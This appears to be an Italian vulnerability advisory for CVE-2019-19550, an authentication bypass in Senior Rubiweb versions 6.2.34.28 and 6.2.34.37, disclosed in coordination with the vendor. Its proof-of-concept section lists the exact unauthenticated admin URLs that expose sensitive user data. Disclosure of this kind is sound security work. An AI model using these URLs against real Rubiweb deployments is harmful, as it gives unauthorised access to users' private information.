CVE-2019-19550
[Descrizione]
Bypass dell'autenticazione remota in Senior Rubiweb 6.2.34.28 e 6.2.34.37 consente l'accesso amministrativo a informazioni sensibili degli utenti interessati che utilizzano versioni vulnerabili. L'attaccante deve solo fornire l'URL corretto.
[Date importanti]
- Annuncio (al fornitore): 2019-12-02
- Data di divulgazione pubblica: 2020-01-30
[Tipo di vulnerabilità]
Controllo degli accessi errato
[Fornitore del prodotto]
Senior
[Base del codice del prodotto interessato]
- Rubiweb - 6.2.34.37
- Rubiweb - 6.2.34.28
- Altre versioni potrebbero essere interessate, in particolare quelle della stessa famiglia (non ancora testate)
[Componente interessato]
Rubiweb
[Tipo di attacco]
Remoto
Vero
[Vettori di attacco]
L'accesso a informazioni sensibili è disponibile pubblicamente senza requisiti speciali (solo l'URI corretto)
[Il fornitore ha confermato o riconosciuto la vulnerabilità?]
Vero
[PoC - Prova di concetto]
- Prova semplicemente a connetterti al portale autenticato per confermare l'esistenza e la versione del prodotto interessato:
- hXXp://subdomain.customer.tld:8080/rubiweb/
- Accedi alla pagina vulnerabile (admin senza autenticazione):
- hXXp://subdomain.customer.tld:8080/rubiweb/conector?ACAO=EXESENHA&SIS=FP&LOGINKIND=1
- hXXp://subdomain.customer.tld:8080/rubiweb/conector?ACAO=ENTRANCEREL&SIS=FP&NOME=FPIN103.ANU
[Scopritore]
Mauricio Santos (R&D UnderProtection) e Hesron Hori (R&D UnderProtection) e @redteambrasil
[Ringraziamenti]
Senior - il team di sicurezza informatica del fornitore che ha collaborato a una divulgazione coordinata
[Riferimenti]